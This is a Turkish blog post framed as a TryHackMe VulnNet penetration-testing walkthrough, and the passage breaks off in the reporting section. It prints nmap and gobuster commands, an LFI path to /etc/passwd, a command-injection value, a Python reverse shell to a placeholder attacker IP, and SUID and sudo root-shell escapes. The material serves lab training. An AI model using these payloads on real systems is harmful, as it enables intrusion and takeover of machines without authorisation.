{"id":42510,"date":"2026-06-13T09:11:38","date_gmt":"2026-06-13T06:11:38","guid":{"rendered":"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/"},"modified":"2026-06-13T09:12:02","modified_gmt":"2026-06-13T06:12:02","slug":"tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi","status":"publish","type":"post","link":"https:\/\/fatihsoysal.com\/blog\/tryhackme-vulnnet-yazisi-adim-adim-sizma-testi-rehberi\/","title":{"rendered":"TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi"},"content":{"rendered":"<h2>TryHackMe VulnNet Yaz\u0131s\u0131: Ad\u0131m Ad\u0131m S\u0131zma Testi Rehberi<\/h2>\n<p>Siber g\u00fcvenlik d\u00fcnyas\u0131nda kendinizi geli\u015ftirmek ve ger\u00e7ek d\u00fcnya senaryolar\u0131na haz\u0131rlanmak i\u00e7in interaktif platformlar b\u00fcy\u00fck \u00f6nem ta\u015f\u0131r. TryHackMe, bu platformlardan biridir ve sundu\u011fu laboratuvarlarla (room) pratik becerilerinizi peki\u015ftirmenize olanak tan\u0131r. Bu makalede, \u00f6zellikle &#8220;VulnNet&#8221; serisindeki makinelerden yola \u00e7\u0131karak, bir s\u0131zma testi s\u00fcrecinin temel ad\u0131mlar\u0131n\u0131, kar\u015f\u0131la\u015f\u0131labilecek zafiyetleri ve bu zafiyetlerin nas\u0131l istismar edilece\u011fini ad\u0131m ad\u0131m inceleyece\u011fiz. Amac\u0131m\u0131z, hem yeni ba\u015flayanlar\u0131n konuya hakim olmas\u0131n\u0131 sa\u011flamak hem de deneyimli kullan\u0131c\u0131lar i\u00e7in baz\u0131 ipu\u00e7lar\u0131 sunmakt\u0131r.<\/p>\n<h2>S\u0131zma Testi Nedir ve Neden \u00d6nemlidir?<\/h2>\n<p>Siber g\u00fcvenlik alan\u0131nda &#8220;s\u0131zma testi&#8221; (penetration testing) terimi, bir sistemin, a\u011f\u0131n veya uygulaman\u0131n g\u00fcvenlik a\u00e7\u0131klar\u0131n\u0131 bulmak, bu a\u00e7\u0131klar\u0131 istismar etmek ve sistemin dayan\u0131kl\u0131l\u0131\u011f\u0131n\u0131 de\u011ferlendirmek amac\u0131yla ger\u00e7ekle\u015ftirilen sim\u00fcle edilmi\u015f bir sald\u0131r\u0131y\u0131 ifade eder. Bu s\u00fcre\u00e7, k\u00f6t\u00fc niyetli akt\u00f6rlerin potansiyel olarak kullanabilece\u011fi zafiyetleri \u00f6nceden tespit ederek, g\u00fcvenlik \u00f6nlemlerinin g\u00fc\u00e7lendirilmesine yard\u0131mc\u0131 olur. Bir s\u0131zma testinin temel amac\u0131, bir sistemin mevcut g\u00fcvenlik duru\u015funu anlamak, zay\u0131f noktalar\u0131n\u0131 belirlemek ve bu zay\u0131fl\u0131klar\u0131 gidermek i\u00e7in somut \u00f6neriler sunmakt\u0131r. Peki, bu s\u00fcre\u00e7 neden bu kadar kritik? G\u00fcn\u00fcm\u00fcz\u00fcn dijitalle\u015fen d\u00fcnyas\u0131nda, veri ihlalleri ve siber sald\u0131r\u0131lar \u015firketler i\u00e7in milyarlarca dolarl\u0131k zararlara yol a\u00e7abilir, itibar kayb\u0131na neden olabilir ve yasal sonu\u00e7lar do\u011furabilir. Bu nedenle, proaktif bir yakla\u015f\u0131mla g\u00fcvenlik a\u00e7\u0131klar\u0131n\u0131 tespit etmek ve d\u00fczeltmek, herhangi bir kurulu\u015fun siber g\u00fcvenlik stratejisinin ayr\u0131lmaz bir par\u00e7as\u0131d\u0131r.<\/p>\n<p>S\u0131zma testi genellikle birka\u00e7 a\u015famadan olu\u015fur: ke\u015fif (reconnaissance), tarama (scanning), eri\u015fim elde etme (gaining access), yetki y\u00fckseltme (privilege escalation) ve iz b\u0131rakmama\/raporlama (maintaining access\/reporting). Ke\u015fif a\u015famas\u0131nda, hedef hakk\u0131nda m\u00fcmk\u00fcn oldu\u011funca fazla bilgi toplan\u0131r; bu bilgiler IP adresleri, alan adlar\u0131, e-posta adresleri, kullan\u0131lan teknolojiler ve \u00e7al\u0131\u015fan bilgileri gibi detaylar\u0131 i\u00e7erebilir. Tarama a\u015famas\u0131nda ise, toplanan bilgiler \u0131\u015f\u0131\u011f\u0131nda hedef sistemlerin a\u00e7\u0131k portlar\u0131, \u00e7al\u0131\u015fan servisleri ve potansiyel zafiyetler belirlenir. Bu iki a\u015fama, sald\u0131rgan\u0131n sistemi anlamas\u0131 ve bir sald\u0131r\u0131 vekt\u00f6r\u00fc belirlemesi i\u00e7in hayati \u00f6neme sahiptir. TryHackMe gibi platformlarda, genellikle hedef sistemin IP adresi verilir ve ke\u015fif a\u015famas\u0131 bu IP \u00fczerinden ba\u015flar. Ancak ger\u00e7ek d\u00fcnya senaryolar\u0131nda, hedef organizasyonun internete a\u00e7\u0131k t\u00fcm varl\u0131klar\u0131n\u0131n ke\u015ffi \u00e7ok daha karma\u015f\u0131k ve zaman al\u0131c\u0131 bir s\u00fcre\u00e7tir. \u00d6rne\u011fin, b\u00fcy\u00fck bir \u015firketin t\u00fcm alt alan adlar\u0131n\u0131, \u00e7al\u0131\u015fanlar\u0131n\u0131n sosyal medya profillerini ve a\u00e7\u0131kta b\u0131rak\u0131lm\u0131\u015f bulut depolama alanlar\u0131n\u0131 bulmak, ciddi bir OSINT (A\u00e7\u0131k Kaynak \u0130stihbarat\u0131) \u00e7al\u0131\u015fmas\u0131 gerektirir. Bu t\u00fcr detayl\u0131 ke\u015fif \u00e7al\u0131\u015fmalar\u0131, sald\u0131rgan\u0131n hedefe y\u00f6nelik daha sofistike sald\u0131r\u0131lar planlamas\u0131na olanak tan\u0131r. S\u0131zma testleri, bu t\u00fcr kapsaml\u0131 ke\u015fif ve sald\u0131r\u0131 senaryolar\u0131n\u0131 sim\u00fcle ederek, organizasyonlar\u0131n kendi g\u00fcvenlik duvarlar\u0131n\u0131 ve savunma mekanizmalar\u0131n\u0131 test etmelerini sa\u011flar. Bu sayede, olas\u0131 bir sald\u0131r\u0131 ger\u00e7ekle\u015fmeden \u00f6nce zafiyetler giderilir ve sistemler daha diren\u00e7li hale getirilir. T\u00fcrkiye&#8217;deki bir\u00e7ok \u015firket de art\u0131k siber g\u00fcvenlik olgunluklar\u0131n\u0131 art\u0131rmak i\u00e7in d\u00fczenli olarak s\u0131zma testleri yapt\u0131rmaktad\u0131r. Bu testler, BT altyap\u0131lar\u0131n\u0131n yan\u0131 s\u0131ra web uygulamalar\u0131 ve mobil uygulamalar i\u00e7in de ge\u00e7erlidir, \u00e7\u00fcnk\u00fc her bir aray\u00fcz potansiyel bir giri\u015f noktas\u0131 olabilir. Bu nedenle, s\u0131zma testi sadece teknik bir s\u00fcre\u00e7 de\u011fil, ayn\u0131 zamanda kapsaml\u0131 bir risk y\u00f6netimi stratejisinin temel bir bile\u015fenidir.<\/p>\n<h2>Hedef Ke\u015ffi ve Zafiyet Tarama S\u00fcreci Nas\u0131l Ba\u015flar?<\/h2>\n<p>Her ba\u015far\u0131l\u0131 s\u0131zma testinin ilk ve en kritik ad\u0131m\u0131, hedef sistem hakk\u0131nda detayl\u0131 bilgi toplamakt\u0131r. Bu a\u015fama, &#8220;ke\u015fif&#8221; (reconnaissance) olarak adland\u0131r\u0131l\u0131r ve adeta bir dedektif gibi ipu\u00e7lar\u0131n\u0131 bir araya getirmeyi gerektirir. TryHackMe&#8217;deki VulnNet gibi odalarda, genellikle size bir hedef IP adresi verilir ve bu, ba\u015flang\u0131\u00e7 noktan\u0131z olur. Ancak ger\u00e7ek d\u00fcnyada, ke\u015fif s\u00fcreci \u00e7ok daha geni\u015ftir; hedef organizasyonun web siteleri, alt alan adlar\u0131, e-posta adresleri, \u00e7al\u0131\u015fan profilleri, sosyal medya varl\u0131klar\u0131 ve hatta fiziksel lokasyonlar\u0131 gibi pek \u00e7ok farkl\u0131 bilgi kayna\u011f\u0131 incelenebilir. Bu a\u015faman\u0131n amac\u0131, potansiyel sald\u0131r\u0131 y\u00fczeyini (attack surface) anlamak ve sonraki ad\u0131mlar i\u00e7in de\u011ferli ipu\u00e7lar\u0131 elde etmektir.<\/p>\n<p>Ke\u015fif a\u015famas\u0131n\u0131n ard\u0131ndan, toplanan bilgiler \u0131\u015f\u0131\u011f\u0131nda hedef sistemin &#8220;tarama&#8221; (scanning) s\u00fcreci ba\u015flar. Tarama, hedef \u00fczerindeki aktif servisleri, a\u00e7\u0131k portlar\u0131 ve bu servislerin versiyonlar\u0131n\u0131 belirlemek i\u00e7in yap\u0131l\u0131r. Bu bilgiler, hangi zafiyetlerin potansiyel olarak istismar edilebilece\u011fine dair bize yol g\u00f6sterir. Nmap (Network Mapper), bu a\u015famada en s\u0131k kullan\u0131lan ve en g\u00fc\u00e7l\u00fc ara\u00e7lardan biridir. Nmap ile hedef IP adresine y\u00f6nelik kapsaml\u0131 port taramalar\u0131 yapabilir, \u00e7al\u0131\u015fan servislerin versiyonlar\u0131n\u0131 \u00f6\u011frenebilir ve hatta i\u015fletim sistemi tespiti yapabilirsiniz. \u00d6rne\u011fin, a\u015fa\u011f\u0131daki komutla hedef sistemdeki t\u00fcm a\u00e7\u0131k TCP portlar\u0131n\u0131 tarayabilir ve bu portlarda \u00e7al\u0131\u015fan servislerin versiyon bilgilerini elde edebilirsiniz:<\/p>\n<div class=\"code-container\">\n<pre><code>nmap -sC -sV -oA nmap_scan &lt;hedef_IP_adresi&gt;<\/code><\/pre>\n<\/p><\/div>\n<p>Burada, <code>-sC<\/code> varsay\u0131lan Nmap betiklerini (script) \u00e7al\u0131\u015ft\u0131rarak daha detayl\u0131 bilgi toplar, <code>-sV<\/code> servis versiyonlar\u0131n\u0131 tespit eder ve <code>-oA nmap_scan<\/code> ise tarama sonu\u00e7lar\u0131n\u0131 farkl\u0131 formatlarda (normal, XML, greppable) <code>nmap_scan<\/code> ad\u0131yla kaydeder. Bu ad\u0131m, sistemde \u00e7al\u0131\u015fan Apache, Nginx gibi web sunucular\u0131n\u0131, SSH, FTP gibi eri\u015fim servislerini veya veritaban\u0131 sunucular\u0131n\u0131 ortaya \u00e7\u0131kar\u0131r. Bu servislerin versiyon bilgileri, daha sonra bilinen zafiyetler (CVE&#8217;ler) a\u00e7\u0131s\u0131ndan ara\u015ft\u0131r\u0131lmak \u00fczere kullan\u0131l\u0131r. \u00d6rne\u011fin, e\u011fer Nmap taramas\u0131 sonucunda hedef sistemde eski bir Apache HTTP Server versiyonunun \u00e7al\u0131\u015ft\u0131\u011f\u0131 tespit edilirse, bu versiyonla ili\u015fkili bilinen g\u00fcvenlik a\u00e7\u0131klar\u0131n\u0131 ara\u015ft\u0131rarak potansiyel bir istismar vekt\u00f6r\u00fc bulabiliriz.<\/p>\n<p>Web sunucular\u0131n\u0131n tespiti durumunda, web uygulamas\u0131 ke\u015ffi de devreye girer. Bu, genellikle web sunucusunda bar\u0131nd\u0131r\u0131lan dizinleri ve dosyalar\u0131 bulmak i\u00e7in &#8220;dizin tarama&#8221; (directory enumeration) ara\u00e7lar\u0131n\u0131 kullanmay\u0131 i\u00e7erir. Gobuster veya Dirb gibi ara\u00e7lar, web sunucular\u0131nda gizlenmi\u015f olabilecek hassas dizinleri (\u00f6rne\u011fin, admin panelleri, yedekleme dosyalar\u0131, konfig\u00fcrasyon dosyalar\u0131) veya geli\u015ftiriciler taraf\u0131ndan unutulmu\u015f dizinleri bulmak i\u00e7in kullan\u0131l\u0131r. A\u015fa\u011f\u0131daki Gobuster komutu, yayg\u0131n bir kelime listesi kullanarak hedef web sitesindeki dizinleri tarar:<\/p>\n<div class=\"code-container\">\n<pre><code>gobuster dir -u http:\/\/&lt;hedef_IP_adresi&gt; -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt<\/code><\/pre>\n<\/p><\/div>\n<p>Bu komut, <code>-u<\/code> ile belirtilen URL&#8217;de, <code>-w<\/code> ile belirtilen kelime listesini kullanarak dizinleri arar ve <code>-x<\/code> ile belirtilen uzant\u0131lar\u0131 da kontrol eder. Bu taramalar sonucunda, \u00f6rne\u011fin bir <code>\/dev<\/code>, <code>\/backup<\/code> veya <code>\/admin<\/code> dizini bulmak, bize ilk eri\u015fimi elde etme yolunda \u00f6nemli ipu\u00e7lar\u0131 sa\u011flayabilir. Bulunan bu dizinler i\u00e7erisinde genellikle konfig\u00fcrasyon dosyalar\u0131, geli\u015ftirici notlar\u0131 veya daha ileri zafiyetleri tetikleyebilecek di\u011fer web sayfalar\u0131 bulunabilir. Bu a\u015famada elde edilen her bilgi par\u00e7as\u0131, bir sonraki ad\u0131m olan ilk eri\u015fimi elde etme s\u00fcrecinde kritik rol oynar. Bu nedenle, sab\u0131rl\u0131 ve metodik bir yakla\u015f\u0131mla ke\u015fif ve tarama yapmak, s\u0131zma testinin ba\u015far\u0131s\u0131 i\u00e7in vazge\u00e7ilmezdir. Elde edilen t\u00fcm bilgileri d\u00fczenli bir \u015fekilde kaydetmek, karma\u015f\u0131k senaryolarda bile yolunuzu kaybetmemenizi sa\u011flar.<\/p>\n<h2>\u0130lk Eri\u015fimi Elde Etme: Web Uygulamas\u0131 Zafiyetleri Nas\u0131l S\u00f6m\u00fcr\u00fcl\u00fcr?<\/h2>\n<p>Ke\u015fif ve tarama a\u015famalar\u0131nda toplad\u0131\u011f\u0131m\u0131z bilgiler, bize hedef sistemde potansiyel giri\u015f noktalar\u0131n\u0131 ve zafiyetleri i\u015faret eder. Bu noktadan itibaren amac\u0131m\u0131z, bu zafiyetleri istismar ederek sisteme ilk eri\u015fimi (initial foothold) elde etmektir. Genellikle bu a\u015famada web uygulamalar\u0131, en yayg\u0131n ve \u00e7e\u015fitli zafiyetlere ev sahipli\u011fi yapt\u0131\u011f\u0131 i\u00e7in odak noktam\u0131z haline gelir. Web uygulamalar\u0131nda s\u0131k\u00e7a kar\u015f\u0131la\u015f\u0131lan zafiyetler aras\u0131nda dosya dahil etme (Local File Inclusion &#8211; LFI), komut enjeksiyonu (command injection), SQL enjeksiyonu, dosya y\u00fckleme (file upload) zafiyetleri ve zay\u0131f kimlik do\u011frulama mekanizmalar\u0131 bulunur. TryHackMe&#8217;deki VulnNet gibi makinelerde, bu t\u00fcr zafiyetlerin basit ama etkili varyasyonlar\u0131 genellikle kar\u015f\u0131m\u0131za \u00e7\u0131kar.<\/p>\n<p>\u00d6rne\u011fin, bir web uygulamas\u0131 kullan\u0131c\u0131dan bir dosya ad\u0131 al\u0131p sunucudan bu dosyay\u0131 okuyarak i\u00e7eri\u011fini g\u00f6steriyorsa, bu bir LFI zafiyetine i\u015faret edebilir. Sald\u0131rgan, bu zafiyeti kullanarak sunucudaki hassas sistem dosyalar\u0131n\u0131 (\u00f6rne\u011fin, <code>\/etc\/passwd<\/code>, <code>\/etc\/shadow<\/code>) okuyabilir. Bu, sistemdeki kullan\u0131c\u0131 adlar\u0131n\u0131 ve \u015fifre hash&#8217;lerini elde etmek i\u00e7in ilk ad\u0131m olabilir. Bir LFI zafiyetini istismar etmek i\u00e7in genellikle a\u015fa\u011f\u0131daki gibi bir URL yap\u0131s\u0131 denenir:<\/p>\n<div class=\"code-container\">\n<pre><code>http:\/\/&lt;hedef_IP_adresi&gt;\/index.php?page=..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n<\/p><\/div>\n<p>E\u011fer bu deneme ba\u015far\u0131l\u0131 olursa, <code>\/etc\/passwd<\/code> dosyas\u0131n\u0131n i\u00e7eri\u011fi web sayfas\u0131nda g\u00f6r\u00fcnt\u00fclenecektir. Bu, sunucunun dosya sistemine eri\u015fim sa\u011flad\u0131\u011f\u0131m\u0131z\u0131n bir g\u00f6stergesidir. Daha da ileri giderek, log dosyalar\u0131na (\u00f6rne\u011fin, Apache eri\u015fim g\u00fcnl\u00fckleri) k\u00f6t\u00fc ama\u00e7l\u0131 kod enjekte edip, LFI ile bu log dosyas\u0131n\u0131 okuyarak kod \u00e7al\u0131\u015ft\u0131rma (Remote Code Execution &#8211; RCE) zafiyeti elde edilebilir. Bu teknik, genellikle &#8220;log poisoning&#8221; olarak bilinir. Bir ba\u015fka yayg\u0131n zafiyet ise komut enjeksiyonudur. E\u011fer bir web uygulamas\u0131, kullan\u0131c\u0131dan ald\u0131\u011f\u0131 girdiyi do\u011frudan bir sistem komutuna arg\u00fcman olarak veriyorsa, bu bir g\u00fcvenlik a\u00e7\u0131\u011f\u0131 yarat\u0131r. Sald\u0131rgan, bu girdiye ek komutlar ekleyerek sunucuda rastgele komutlar \u00e7al\u0131\u015ft\u0131rabilir. \u00d6rne\u011fin, bir &#8220;ping&#8221; arac\u0131 taklidi yapan bir web sayfas\u0131nda IP adresi yerine <code>127.0.0.1; ls -la \/<\/code> gibi bir girdi denenebilir. E\u011fer sistem bu komutu \u00e7al\u0131\u015ft\u0131r\u0131rsa, <code>\/<\/code> dizinindeki dosyalar\u0131n listesi ekrana yans\u0131yacakt\u0131r. Bu t\u00fcr bir zafiyet tespit edildi\u011finde, genellikle bir &#8220;reverse shell&#8221; elde etmeye \u00e7al\u0131\u015f\u0131r\u0131z.<\/p>\n<p>Reverse shell, sald\u0131rgan\u0131n kendi makinesinde bir dinleyici (listener) a\u00e7arak, hedef sistemden bu dinleyiciye bir ba\u011flant\u0131 kurmas\u0131n\u0131 sa\u011flayan bir tekniktir. Bu sayede, sald\u0131rgan hedef sistem \u00fczerinde interaktif bir kabuk (shell) elde eder ve komutlar\u0131 do\u011frudan \u00e7al\u0131\u015ft\u0131rabilir. A\u015fa\u011f\u0131daki \u00f6rnekte, Netcat (<code>nc<\/code>) kullanarak bir dinleyici (listener) a\u00e7\u0131l\u0131r ve Python ile hedef sistemden bu dinleyiciye bir reverse shell g\u00f6nderilir:<\/p>\n<div class=\"code-container\">\n<pre><code># Sald\u0131rgan makinesinde (listener)\nnc -lvnp 4444\n\n# Hedef sistemde (web uygulamas\u0131 \u00fczerinden komut enjeksiyonu ile \u00e7al\u0131\u015ft\u0131r\u0131lacak)\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"&lt;sald\u0131rgan_IP_adresi&gt;\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);'<\/code><\/pre>\n<\/p><\/div>\n<p>Bu Python kodu, hedef sistemden sald\u0131rgan\u0131n 4444 portunda dinleyen makinesine bir TCP ba\u011flant\u0131s\u0131 kurar ve ard\u0131ndan standart giri\u015f\/\u00e7\u0131k\u0131\u015f\/hata ak\u0131\u015flar\u0131n\u0131 bu ba\u011flant\u0131ya y\u00f6nlendirerek interaktif bir kabuk sa\u011flar. Reverse shell elde etmek, s\u0131zma testinin en \u00f6nemli d\u00f6n\u00fcm noktalar\u0131ndan biridir \u00e7\u00fcnk\u00fc art\u0131k hedef sistem \u00fczerinde komut \u00e7al\u0131\u015ft\u0131rma yetene\u011fine sahip oluruz. Ancak genellikle ilk elde edilen kabuk, d\u00fc\u015f\u00fck yetkili bir kullan\u0131c\u0131ya aittir. Bu da bizi bir sonraki a\u015famaya, yani yetki y\u00fckseltmeye (privilege escalation) y\u00f6nlendirir. Dosya y\u00fckleme zafiyetleri de benzer \u015fekilde ilk eri\u015fim i\u00e7in kullan\u0131labilir. E\u011fer bir web uygulamas\u0131, y\u00fcklenen dosyalar\u0131n t\u00fcr\u00fcn\u00fc veya i\u00e7eri\u011fini yeterince kontrol etmiyorsa, sald\u0131rgan k\u00f6t\u00fc ama\u00e7l\u0131 bir PHP kabu\u011fu (webshell) y\u00fckleyebilir ve bu kabuk \u00fczerinden sunucuda komut \u00e7al\u0131\u015ft\u0131rabilir. Bu t\u00fcr zafiyetlerin tespiti ve istismar\u0131, dikkatli bir deneme-yan\u0131lma s\u00fcreci ve web uygulama g\u00fcvenli\u011fi prensipleri hakk\u0131nda sa\u011flam bilgi gerektirir. Her bir zafiyetin kendine \u00f6zg\u00fc istismar y\u00f6ntemleri vard\u0131r ve ba\u015far\u0131l\u0131 olmak i\u00e7in do\u011fru arac\u0131 ve tekni\u011fi se\u00e7mek \u00f6nemlidir.<\/p>\n<h2>Yetki Y\u00fckseltme (Privilege Escalation): K\u00f6k Kullan\u0131c\u0131ya Giden Yol<\/h2>\n<p>\u0130lk eri\u015fimi elde ettikten sonra, genellikle d\u00fc\u015f\u00fck yetkili bir kullan\u0131c\u0131 olarak sisteme dahil oluruz. Bu durum, sisteme tam kontrol sa\u011flamak ve kritik verilere eri\u015fmek i\u00e7in yeterli de\u011fildir. \u0130\u015fte bu noktada &#8220;yetki y\u00fckseltme&#8221; (privilege escalation) devreye girer. Yetki y\u00fckseltme, bir sald\u0131rgan\u0131n sistem \u00fczerindeki ayr\u0131cal\u0131klar\u0131n\u0131 art\u0131rarak daha y\u00fcksek yetkilere (genellikle k\u00f6k kullan\u0131c\u0131 veya y\u00f6netici yetkileri) sahip olmas\u0131n\u0131 sa\u011flayan s\u00fcre\u00e7tir. Bu a\u015fama, s\u0131zma testinin en zorlu ve yarat\u0131c\u0131l\u0131k gerektiren k\u0131s\u0131mlar\u0131ndan biri olabilir, \u00e7\u00fcnk\u00fc her sistemin kendine \u00f6zg\u00fc yap\u0131land\u0131rma hatalar\u0131 veya zafiyetleri bulunabilir. TryHackMe&#8217;deki VulnNet makineleri de genellikle bu a\u015famada \u00e7e\u015fitli zorluklar sunar.<\/p>\n<p>Linux sistemlerinde yetki y\u00fckseltme i\u00e7in bir\u00e7ok farkl\u0131 y\u00f6ntem bulunur. Bunlardan baz\u0131lar\u0131 \u015funlard\u0131r:<\/p>\n<ol>\n<li><strong>SUID ve SGID Bitleri:<\/strong> SUID (Set User ID) ve SGID (Set Group ID) bitleri, bir dosyan\u0131n sahibi veya grubunun yetkileriyle \u00e7al\u0131\u015ft\u0131r\u0131lmas\u0131n\u0131 sa\u011flar, bu da o dosyay\u0131 \u00e7al\u0131\u015ft\u0131ran kullan\u0131c\u0131n\u0131n kendi yetkilerini ge\u00e7ici olarak y\u00fckseltmesine olanak tan\u0131r. E\u011fer bir program, \u00f6rne\u011fin <code>\/bin\/bash<\/code>, SUID bitiyle root kullan\u0131c\u0131s\u0131na aitse, bu program\u0131 \u00e7al\u0131\u015ft\u0131ran herhangi bir kullan\u0131c\u0131 root yetkileriyle yeni bir kabuk elde edebilir. Zafiyetli SUID bitine sahip dosyalar\u0131 bulmak i\u00e7in a\u015fa\u011f\u0131daki komut kullan\u0131labilir:\n<div class=\"code-container\">\n<pre><code>find \/ -perm -u=s -type f 2>\/dev\/null<\/code><\/pre>\n<\/p><\/div>\n<p>            Bu komut, sistemdeki SUID bitine sahip t\u00fcm dosyalar\u0131 listeler. \u00c7\u0131kan sonu\u00e7lar aras\u0131nda <code>nmap<\/code>, <code>find<\/code>, <code>vim<\/code> gibi beklenmedik programlar varsa, bunlar yetki y\u00fckseltme i\u00e7in kullan\u0131labilir. \u00d6rne\u011fin, e\u011fer <code>find<\/code> komutu SUID bitine sahipse, a\u015fa\u011f\u0131daki gibi bir komutla root kabu\u011fu elde edilebilir:<\/p>\n<div class=\"code-container\">\n<pre><code>find . -exec \/bin\/sh -p \\; -quit<\/code><\/pre>\n<\/p><\/div>\n<\/li>\n<li><strong>Sudo Miskonfig\u00fcrasyonlar\u0131:<\/strong> <code>sudo<\/code> komutu, yetkili kullan\u0131c\u0131lar\u0131n di\u011fer kullan\u0131c\u0131lar ad\u0131na belirli komutlar\u0131 \u00e7al\u0131\u015ft\u0131rmas\u0131na izin verir. Ancak yanl\u0131\u015f yap\u0131land\u0131r\u0131ld\u0131\u011f\u0131nda, bu bir g\u00fcvenlik a\u00e7\u0131\u011f\u0131na d\u00f6n\u00fc\u015febilir. <code>sudo -l<\/code> komutu, mevcut kullan\u0131c\u0131n\u0131n <code>sudo<\/code> ile hangi komutlar\u0131 \u00e7al\u0131\u015ft\u0131rabilece\u011fini g\u00f6sterir. E\u011fer kullan\u0131c\u0131, parola gerektirmeden veya root yetkileriyle \u00e7al\u0131\u015ft\u0131r\u0131labilecek tehlikeli bir komuta (\u00f6rne\u011fin, <code>\/usr\/bin\/python<\/code> veya <code>\/usr\/bin\/vim<\/code>) eri\u015febiliyorsa, bu yetki y\u00fckseltme i\u00e7in kullan\u0131labilir. \u00d6rne\u011fin, <code>sudo \/usr\/bin\/python<\/code> yetkiniz varsa, Python i\u00e7inde bir kabuk a\u00e7arak root yetkileri elde edebilirsiniz:\n<div class=\"code-container\">\n<pre><code>sudo python -c 'import os; os.system(\"\/bin\/bash\")'<\/code><\/pre>\n<\/p><\/div>\n<p>            veya <code>sudo \/usr\/bin\/vim<\/code> yetkiniz varsa:<\/p>\n<div class=\"code-container\">\n<pre><code>sudo vim\n:!\/bin\/bash<\/code><\/pre>\n<\/p><\/div>\n<p>            <code>vim<\/code> i\u00e7inde <code>:!\/bin\/bash<\/code> komutu, yeni bir kabuk a\u00e7arak root yetkileriyle i\u015flem yapman\u0131z\u0131 sa\u011flar.\n        <\/li>\n<li><strong>Cron \u0130\u015fleri:<\/strong> Cron, Linux sistemlerinde belirli zamanlarda otomatik olarak \u00e7al\u0131\u015fan g\u00f6revleri (scheduled tasks) y\u00f6neten bir servistir. E\u011fer bir cron i\u015fi root yetkileriyle \u00e7al\u0131\u015f\u0131yor ve bu i\u015fin \u00e7al\u0131\u015ft\u0131rd\u0131\u011f\u0131 betik (script) veya dosyalar, d\u00fc\u015f\u00fck yetkili bir kullan\u0131c\u0131 taraf\u0131ndan de\u011fi\u015ftirilebiliyorsa, bu bir yetki y\u00fckseltme vekt\u00f6r\u00fc olabilir. <code>\/etc\/crontab<\/code> veya <code>\/etc\/cron.d\/<\/code> dizinleri kontrol edilerek bu t\u00fcr zafiyetler aranabilir.<\/li>\n<li><strong>Kernel ve Yaz\u0131l\u0131m Zafiyetleri:<\/strong> Sistemde kurulu olan i\u015fletim sistemi \u00e7ekirde\u011fi (kernel) veya di\u011fer yaz\u0131l\u0131mlarda bilinen zafiyetler (exploit&#8217;ler) bulunabilir. Bu t\u00fcr zafiyetler genellikle CVE (Common Vulnerabilities and Exposures) veritabanlar\u0131nda listelenir. <code>uname -a<\/code> komutuyla kernel versiyonu \u00f6\u011frenildikten sonra, bu versiyona ait bilinen exploit&#8217;ler ara\u015ft\u0131r\u0131labilir.<\/li>\n<li><strong>Hassas Dosyalar ve Yap\u0131land\u0131rma Hatalar\u0131:<\/strong> Bazen sistemde yanl\u0131\u015f izinlerle b\u0131rak\u0131lm\u0131\u015f hassas dosyalar (\u00f6rne\u011fin, veritaban\u0131 kimlik bilgileri, SSH anahtarlar\u0131) yetki y\u00fckseltmeye yol a\u00e7abilir. <code>\/var\/www\/html<\/code>, <code>\/opt<\/code>, <code>\/tmp<\/code> gibi dizinler ve bu dizinlerdeki dosyalar\u0131n izinleri kontrol edilmelidir.<\/li>\n<\/ol>\n<p>Yetki y\u00fckseltme s\u00fcrecinde <code>LinPEAS<\/code> veya <code>Privilege Escalation Awesome Script (PEAS)<\/code> gibi otomatik ara\u00e7lar da kullan\u0131labilir. Bu ara\u00e7lar, sistemdeki potansiyel yetki y\u00fckseltme vekt\u00f6rlerini h\u0131zl\u0131 bir \u015fekilde tespit etmek i\u00e7in tasarlanm\u0131\u015ft\u0131r. Ancak bu ara\u00e7lar\u0131n \u00e7\u0131kt\u0131s\u0131n\u0131 do\u011fru yorumlamak ve manuel do\u011frulama yapmak \u00f6nemlidir. Genellikle bir otomatik ara\u00e7, onlarca potansiyel zafiyet g\u00f6sterebilir, ancak bunlar\u0131n hangisinin ger\u00e7ekten istismar edilebilir oldu\u011funu anlamak deneyim gerektirir. Unutulmamal\u0131d\u0131r ki, yetki y\u00fckseltme sadece teknik bilgi de\u011fil, ayn\u0131 zamanda sistemin \u00e7al\u0131\u015fma prensipleri ve g\u00fcvenlik mekanizmalar\u0131 hakk\u0131nda derinlemesine bir anlay\u0131\u015f gerektirir. Her sistem farkl\u0131d\u0131r ve ba\u015far\u0131l\u0131 bir yetki y\u00fckseltme, yarat\u0131c\u0131 d\u00fc\u015f\u00fcnmeyi ve farkl\u0131 y\u00f6ntemleri birle\u015ftirmeyi gerektirebilir. TryHackMe&#8217;deki VulnNet gibi odalar, bu becerileri ger\u00e7ek\u00e7i bir ortamda geli\u015ftirmeniz i\u00e7in m\u00fckemmel f\u0131rsatlar sunar.<\/p>\n<h2>Elde Edilen Bulgular\u0131 Raporlama ve G\u00fcvenli\u011fi Art\u0131rma<\/h2>\n<p>S\u0131zma testinin teknik k\u0131sm\u0131 tamamland\u0131\u011f\u0131nda, yani hedef sistemde ilk eri\u015fim elde edilip yetki y\u00fckseltme ba\u015far\u0131yla ger\u00e7ekle\u015ftirildi\u011finde, s\u00fcrecin en az teknik k\u0131s\u0131mlar kadar \u00f6nemli olan bir di\u011fer a\u015famas\u0131 ba\u015flar: bulgular\u0131 raporlama ve g\u00fcvenlik iyile\u015ftirmeleri \u00f6nerme. TryHackMe gibi platformlarda genellikle &#8220;root bayra\u011f\u0131n\u0131 bulma&#8221; ile s\u00fcre\u00e7 sona erer, ancak ger\u00e7ek d\u00fcnya s\u0131zma testlerinde elde edilen t\u00fcm bilgilerin, zafiyetlerin ve istismar y\u00f6ntemlerinin detayl\u0131 bir \u015fekilde belgelenmesi hayati \u00f6nem ta\u015f\u0131r. Bu rapor, m\u00fc\u015fteriye veya ilgili birime, sistemlerinin mevcut g\u00fcvenlik duru\u015funu, kar\u015f\u0131la\u015f\u0131lan riskleri ve bu riskleri azaltmak i\u00e7in at\u0131lmas\u0131 gereken ad\u0131mlar\u0131 